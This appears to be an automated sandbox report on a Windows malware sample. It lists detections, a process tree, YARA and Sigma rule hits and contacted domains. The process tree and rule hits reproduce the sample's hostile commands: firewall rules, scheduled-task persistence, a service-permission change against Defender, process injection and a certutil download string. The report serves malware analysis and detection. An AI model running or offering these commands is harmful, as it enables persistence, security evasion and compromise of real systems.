Windows Analysis Report jkDmft1Qoe

Overview

General Information

Sample Name: jkDmft1Qoe (renamed file extension from none to exe)
Analysis ID: 504422
MD5: 099ad37ceccdfa74229d976b10973736
SHA1: 1b6d65319dcb21fa94310c04bc3abd89b90b4699
SHA256: df84d3e83b4105f9178e518ca69e1a2ec3116d3223003857d892b8a6f64b05ba
Tags: 32, exe

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • jkDmft1Qoe.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\jkDmft1Qoe.exe' MD5: 099AD37CECCDFA74229D976B10973736)
    • jkDmft1Qoe.exe (PID: 3176 cmdline: C:\Users\user\Desktop\jkDmft1Qoe.exe MD5: 099AD37CECCDFA74229D976B10973736)
      • cmd.exe (PID: 4420 cmdline: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • netsh.exe (PID: 6380 cmdline: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csrss.exe (PID: 4612 cmdline: C:\Windows\rss\csrss.exe '' MD5: 099AD37CECCDFA74229D976B10973736)
        • schtasks.exe (PID: 5396 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5556 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 5704 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 6684 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 7152 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 7044 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 4420 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
        • injector.exe (PID: 1332 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
          • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • windefender.exe (PID: 5628 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
          • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6140 cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 5188 cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • TrustedInstaller.exe (PID: 7128 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • csrss.exe (PID: 6708 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
    • csrss.exe (PID: 7116 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
  • csrss.exe (PID: 6860 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 099AD37CECCDFA74229D976B10973736)
    • csrss.exe (PID: 616 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
  • svchost.exe (PID: 6356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 5472 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 099AD37CECCDFA74229D976B10973736)
    • csrss.exe (PID: 4552 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
  • svchost.exe (PID: 4564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • windefender.exe (PID: 496 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
jkDmft1Qoe.exe | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Windows\rss\csrss.exe | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp | Certutil_Decode_OR_Download | Certutil Decode | Florian Roth
  • 0xda4a:$a6: certutil.exe -urlcache -split -f http
  • 0xdec8:$a6: certutil.exe -urlcache -split -f http
0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp | Certutil_Decode_OR_Download | Certutil Decode | Florian Roth
  • 0x14a4a:$a6: certutil.exe -urlcache -split -f http
  • 0x14ec8:$a6: certutil.exe -urlcache -split -f http
00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmp | Certutil_Decode_OR_Download | Certutil Decode | Florian Roth
  • 0xda4a:$a6: certutil.exe -urlcache -split -f http
  • 0xdec8:$a6: certutil.exe -urlcache -split -f http

Unpacked PEs

Source | Rule | Description | Author | Strings
34.0.csrss.exe.9a7760.2.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x444b8:$s2: The Magic Word!
  • 0x505f8:$s2: The Magic Word!
  • 0x44818:$s3: Software\Oracle\VirtualBox
  • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
4.0.jkDmft1Qoe.exe.9af360.3.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x3c8b8:$s2: The Magic Word!
  • 0x489f8:$s2: The Magic Word!
  • 0x3cc18:$s3: Software\Oracle\VirtualBox
  • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
34.2.csrss.exe.9a7760.2.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x444b8:$s2: The Magic Word!
  • 0x505f8:$s2: The Magic Word!
  • 0x44818:$s3: Software\Oracle\VirtualBox
  • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
32.2.csrss.exe.9a7760.1.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x444b8:$s2: The Magic Word!
  • 0x505f8:$s2: The Magic Word!
  • 0x44818:$s3: Software\Oracle\VirtualBox
  • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.jkDmft1Qoe.exe.9a7760.1.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x444b8:$s2: The Magic Word!
  • 0x505f8:$s2: The Magic Word!
  • 0x44818:$s3: Software\Oracle\VirtualBox
  • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly
Source: Process started, Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentImage: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentProcessId: 3176, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 4612
Sigma detected: Suspicious Service DACL Modification
Source: Process started, Author: Jonhnathan Ribeiro, oscd.community: Data: Command: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6140, ProcessCommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ProcessId: 5188
Sigma detected: Netsh Port or Application Allowed
Source: Process started, Author: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4420, ProcessCommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, ProcessId: 6380
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentImage: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentProcessId: 3176, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 4612

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started, Author: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe '', ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 4612, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, ProcessId: 5396

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: jkDmft1Qoe.exe, Virustotal: Detection: 57%
Source: jkDmft1Qoe.exe, Metadefender: Detection: 34%
Source: jkDmft1Qoe.exe, ReversingLabs: Detection: 46%
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Source: gohnot.com, Virustotal: Detection: 5%
Source: server1.trumops.com, Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll, Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll, ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, ReversingLabs: Detection: 73%
Source: C:\Windows\rss\csrss.exe, Metadefender: Detection: 34%
Source: C:\Windows\rss\csrss.exe, ReversingLabs: Detection: 46%
Source: C:\Windows\windefender.exe, ReversingLabs: Detection: 40%
Machine Learning detection for sample
Source: jkDmft1Qoe.exe, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Windows\rss\csrss.exe, Joe Sandbox ML: detected
Source: 10.3.csrss.exe.11920c00.9.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.2.csrss.exe.11c1c000.10.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.2.csrss.exe.11b9c000.9.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: jkDmft1Qoe.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: The module signature does not match with .pdb signature. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: .pdb.dbg source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: '(EfiGuardDxe.pdbx source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: symsrv.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.676233642.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000011.00000002.701096602.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000016.00000002.702361556.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.697442468.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.707266801.0000000000C57000.00000008.00020000.sdmp
          Source: Binary string: or you do not have access permission to the .pdb location. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: EfiGuardDxe.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF6148A5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,35_2_00007FF6148A5C10

          Networking:

          Found Tor onion address
